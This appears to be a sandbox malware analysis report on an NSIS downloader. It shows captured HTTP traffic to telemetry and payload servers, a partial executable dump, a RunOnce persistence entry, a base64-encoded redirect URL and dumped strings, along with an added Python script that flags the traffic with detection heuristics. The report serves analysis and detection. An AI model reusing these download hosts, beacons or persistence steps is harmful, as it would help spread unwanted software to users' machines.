Connection: keep-alive
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.8.1</center>
</body>
</html>
GET /r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
ok
GET /0.gif?2601768&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f
HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 Apr 2016 08:03:32 GMT
Connection: keep-alive
ETag: "5710a054-f21d"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /0.gif?2601800&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
Set-Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f; domain=.histats.com; Max-Age=31536000; Expires=Sat, 29-Apr-2017 11:27:34 GMT
GIF89a.............!.......,...........D..;..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 182
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
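The IDS section recorded no alerts, but several properties of the exchanges above are usable as detection logic: the NSIS_Inetc User-Agent, a PE body returned with Content-Type: text/html, a PE download whose Content-Disposition filename has no extension, and a JSON body posted as application/x-www-form-urlencoded to a bare ELB hostname. The Python below is an added example, not tooling from the report; it applies those checks to request/response pairs constructed from the headers shown above (bodies trimmed to their first bytes, the prm= parameter omitted). Each tag is a heuristic that a legitimate installer rarely trips, not a verdict on its own.

```python
import re

# Request/response pairs constructed from the captured headers above.
DL_PHP_REQUEST = (
    "GET /vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc HTTP/1.1\r\n"
    "User-Agent: NSIS_Inetc (Mozilla)\r\n"
    "Host: www.download-servers.com\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
DL_PHP_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: nginx/1.8.0\r\nContent-Type: text/html\r\n"
    "Content-Length: 253819\r\nX-Powered-By: PHP/5.5.32\r\n\r\n"
    "MZ\x90\x00\x03\x00This program cannot be run in DOS mode."
)
TEM_PHP_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\nContent-Length: 80466\r\n"
    "Content-Transfer-Encoding: binary\r\n"
    "Content-Disposition: attachment; filename=tJEcW\r\n\r\n"
    "MZ\x90\x00\x03\x00PE"
)
ELB_REQUEST = (
    "POST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: NSIS_Inetc (Mozilla)\r\n"
    "Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com\r\n"
    "Content-Length: 115\r\n\r\n"
    '{"table": "event_has_user","data": "{\\"event_event_id\\": \\"4958\\",'
    '\\"channel_id\\": \\"\\", \\"utm_addition\\":\\"v=2\\"}"}'
)
ELB_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/json; charset=utf-8\r\n"
    'Content-Length: 15\r\n\r\n{"Status":"OK"}'
)


def parse_http(raw: str):
    """Split a raw HTTP message into (start line, {lower-cased header: value}, body).
    The first blank line separates headers from the body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def triage_exchange(request_raw: str, response_raw: str) -> list:
    """Return indicator tags for one request/response pair, in a fixed order."""
    req_start, req, req_body = parse_http(request_raw)
    _, resp, resp_body = parse_http(response_raw)
    tags = []

    # Default User-Agent of the NSIS Inetc plug-in; common in bundlers, rare in browsers.
    if req.get("user-agent", "").startswith("NSIS_Inetc"):
        tags.append("nsis-inetc-downloader")

    # A PE image (MZ header) delivered under a non-binary media type.
    ctype = resp.get("content-type", "").lower()
    is_pe = resp_body.startswith("MZ")
    if is_pe and not ctype.startswith("application/"):
        tags.append("pe-served-as-" + (ctype.split(";")[0] or "untyped"))

    # A PE image whose suggested filename has no extension (tJEcW above).
    m = re.search(r'filename="?([^";]+)', resp.get("content-disposition", ""))
    if is_pe and m and "." not in m.group(1):
        tags.append("pe-without-extension")

    # JSON posted under a form-encoded Content-Type: a hand-rolled client, not a browser form.
    if (req_start.startswith("POST")
            and req.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and req_body.lstrip().startswith("{")):
        tags.append("json-body-declared-as-form")

    # Telemetry addressed to a load balancer's generated name rather than a vanity host.
    if req.get("host", "").endswith(".elb.amazonaws.com"):
        tags.append("bare-elb-hostname")
    return tags


if __name__ == "__main__":
    print(triage_exchange(DL_PHP_REQUEST, DL_PHP_RESPONSE))
    print(triage_exchange(DL_PHP_REQUEST, TEM_PHP_RESPONSE))
    print(triage_exchange(ELB_REQUEST, ELB_RESPONSE))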
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_856:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
netc.dll
0732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Software\Microsoft\Windows\CurrentVersion\RunOnce
r.dll
nstall.exe
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp\inetc.dll
or.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
IpConfig.dll
zcÃ
L%sDL'y
qk.RQk
1ve%s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
nsw18.tmp
aed3248e8f04ac2affda17.exe
2C7DF~1.EXE
ments and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe /runonce
6-6726-ADB2-5C02-3742FA8A8B37
tNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
1 2 3 4 5 6 7 8 9 10 11
tion Data\InstallW\Full_Setup.exe
tp://data.biphysics.com/r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
3 4 5 6 7 8 9 10 11
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
c:\%original file name%.exe
%Documents and Settings%\%current user%\Application Data\InstallW
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp
10732314-17
dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe
)-.Yln
Nullsoft Install System v2.46
1.0.0.0
nsoA.tmp_240:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
360TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu10.tmp\inetc.dll
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
8!8-8B8I8}8
@.reloc
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
u.Uj@
MSVCRT.dll
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%UXn5
.jL J
#vWeB0,
.qo8KT
kRV%D
>aO.nF
k%UO^
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb19.tmp
nsb19.tmp
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
Uninstall.exe
n.php?r=vu_vo2_
mobilitydata5.com/SysInfo/tem.php?sid=83837567483
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsoA.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv14.tmp
dlgen.php?r=vu_vo2_
)-.Yln
Nullsoft Install System v2.46
1.0.0.1
nsg16.tmp_1164:
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
h.hTZ
,T.UV
Nullsoft Install System v2.46.5-Unicode
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
%Program Files%
\System.dll
\nsExec.dll
\INetC.dll
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsg16.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx1A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp